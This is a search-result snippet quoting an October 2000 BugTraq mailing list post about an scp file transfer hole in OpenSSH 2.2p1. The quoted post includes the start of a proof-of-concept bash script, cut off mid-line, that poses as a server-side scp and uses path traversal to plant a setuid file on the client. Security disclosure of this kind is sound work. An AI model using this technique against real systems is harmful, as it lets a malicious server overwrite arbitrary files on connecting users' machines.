Displaying 1 result from an estimated 1 matches for "scpisbuggy".

2000 Oct 02
(from BugTraq) openssh2.2.p1 - Re: scp file transfer hole
...nt can spoof legitimate scp data,
> overwriting arbitrary files.
>
> As a proof of concept, I created trivial scp replacement (put it on remote
> machine in the place of original scp binary - usually in /usr/local/bin).
> It will try to exploit any file transfer, creating setuid /tmp/ScpIsBuggy
> file on client system:
>
> --
> #!/bin/bash
>
> echo "D0755 0 ../../../../../../tmp/nope"
> echo "D0755 0 ../../../../../../tmp"
> echo "C4755 200 ScpIsBuggy"
> dd if=/dev/urandom of=/dev/stdout bs=200 count=1 2>/dev/null
> dd if=/dev...